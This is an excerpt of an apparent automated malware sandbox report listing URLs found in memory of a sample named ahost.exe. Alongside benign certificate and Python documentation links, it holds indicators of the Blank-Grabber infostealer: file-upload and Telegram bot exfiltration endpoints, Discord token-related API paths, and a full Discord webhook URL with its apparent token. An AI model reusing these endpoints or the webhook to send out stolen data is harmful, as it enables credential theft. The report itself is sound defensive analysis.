Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000C.00000002.1503740397.000001FBC1368000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000C.00000002.1503740397.000001FBC1141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B015E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1503740397.000001FBC1368000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: ahost.exe, 00000000.00000002.1887734193.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ahost.exe, 00000002.00000002.1874902804.000002162D8F8000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1618434399.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1602338590.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632068064.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1596519190.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1642271166.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1873852301.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866135475.000002162D05C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 0000000C.00000002.1503740397.000001FBC1141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B015E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadr#
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr~
Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr~r
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: ahost.exe, 00000000.00000003.1394122926.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: ahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPs
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: ahost.exe, 00000002.00000003.1402625543.000002162BDB8000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417086110.000002162BD54000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1414363268.000002162BD8C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1412497532.000002162BD8C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: ahost.exe, 00000002.00000002.1869617647.000002162BC00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: ahost.exe, 00000002.00000002.1869508336.000002162B9B0000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1401051914.000002162B9DF000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: ahost.exe, 00000002.00000002.1869186848.000002162B824000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: ahost.exe, 00000002.00000002.1869186848.000002162B824000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: ahost.exe, 00000002.00000002.1869508336.000002162B9B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ahost.exe, 00000002.00000002.1871480302.000002162C410000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: svchost.exe, 00000015.00000003.1476407714.0000021787633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000015.00000003.1476407714.0000021787600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberr#
Source: ahost.exe, 00000002.00000003.1414867373.000002162C0BE000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1413977247.000002162C414000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: ahost.exe, 00000002.00000002.1869186848.000002162B824000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: ahost.exe, 00000002.00000003.1417480354.000002162BD7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2168
Source: ahost.exe, 00000002.00000002.1871480302.000002162C410000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: ahost.exe, 00000002.00000003.1417480354.000002162BD7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3020
Source: ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: powershell.exe, 00000046.00000002.1646857023.0000017B02214000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: ahost.exe, 00000002.00000003.1605942422.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871213413.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866866595.000002162C365000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C2C4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C36A000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1640893312.000002162C369000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C2CF000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1617356386.000002162C36A000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C364000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C2D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: ahost.exe, 00000002.00000003.1549319883.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1605942422.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C342000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: ahost.exe, 00000002.00000002.1870511301.000002162C154000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
